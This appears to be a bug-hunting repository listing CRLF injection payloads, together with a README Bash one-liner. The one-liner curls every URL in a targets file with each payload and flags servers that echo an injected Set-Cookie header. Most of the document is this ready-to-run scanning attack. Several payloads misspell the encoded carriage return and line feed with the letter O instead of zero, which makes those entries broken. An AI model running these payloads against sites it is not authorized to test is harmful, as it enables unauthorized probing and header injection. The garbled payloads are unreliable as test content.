├── subdomains.txt ├── crlf_payloads.txt └── README.md /subdomains.txt: -------------------------------------------------------------------------------- 1 | https://website1.com 2 | https://website2.com 3 | http://website3.com 4 | -------------------------------------------------------------------------------- /crlf_payloads.txt: -------------------------------------------------------------------------------- 1 | /%%0a0aSet-Cookie:crlf=injection 2 | /%0aSet-Cookie:crlf=injection 3 | /%Od%OaSet-Cookie:crlf=injection 4 | /%OdSet-Cookie:crlf=injection 5 | /%23%OaSet-Cookie:crlf=injection 6 | /%23%Od%OaSet-Cookie:crlf=injection 7 | /%23%OdSet-Cookie:crlf=injection 8 | /%25%30%61Set-Cookie:crlf=injection 9 | /%25%30aSet-Cookie:crlf=injection 10 | /%250aSet-Cookie:crlf=injection 11 | /%25250aSet-Cookie:crlf=injection 12 | /%2e%2e%2f%Od%OaSet-Cookie:crlf=injection 13 | /%2f%2e%2e%Od%OaSet-Cookie:crlf=injection 14 | /%2F..%Od%OaSet-Cookie:crlf=injection 15 | /%3f%Od%OaSet-Cookie:crlf=injection 16 | /%3f%OdSet-Cookie:crlf=injection 17 | /%u000aSet-Cookie:crlf=injection 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CRLF-one-liner 2 | A simple Bash one liner with aim to automate CRLF vulnerability scanning. This is an extremely helpful and practical One liner for Bug Hunters, which helps you find CRLF missconfiguration in every possible method. Simply replace the links in subdomains.txt with the URL you want to target. This will help you scan for CRLF vulnerability without the need of an external tool. What you have to do is to copy-and-paste the commands into your terminal and finger crossed for any possible CRLF. 3 | 4 | ## One-Liner Payload 5 | 6 | `input='CRLF-one-liner/subdomains.txt';while IFS= read -r targets; do cat CRLF-one-liner/crlf_payloads.txt|xargs -I % sh -c "curl -vs --max-time 9 $targets/% 2>&1 |grep -q '< Set-Cookie: ?crlf'&& echo $targets '[+] is vulnerable with payload: '%>>crlf_results.txt||echo '[-] Not vulnerable: '$targets";done<$input` 7 | 8 | ## Installation 9 | 10 | **Linux and Mac:** 11 | 12 | Download the github repository (from the /home directory): 13 | `git clone https://github.com/kleiton0x00/CRLF-one-liner.git` 14 | 15 | **Windows:** 16 | https://github.com/kleiton0x00/CRLF-one-liner/archive/master.zip 17 | `Save it in Desktop` 18 | `Extract the zip` 19 | 20 | ## Usage 21 | 1. Open subdomains.txt and add the URL you want to scan. 22 | 2. Copy and paste the One-Liner Payload into your terminal 23 | 24 | ## Demo 25 | 26 | ![Demo CRLF one liner](https://i.imgur.com/A43KlGE.gif) 27 | 28 | ## NOTE 29 | Make sure to execute the payload directly as you open the terminal. Don't change directory for any reason! However if your local directory doesn't match to the payload's directory, please feel free to manually change it. 30 | For example: 31 | From `input='Desktop/CRLF-one-liner/subdomains.txt'` to `input='another/path/to/subdomains.txt'` 32 | From `cat CRLF-one-liner/crlf_payloads.txt` to `cat path/to/crlf_payloads.txt` 33 | --------------------------------------------------------------------------------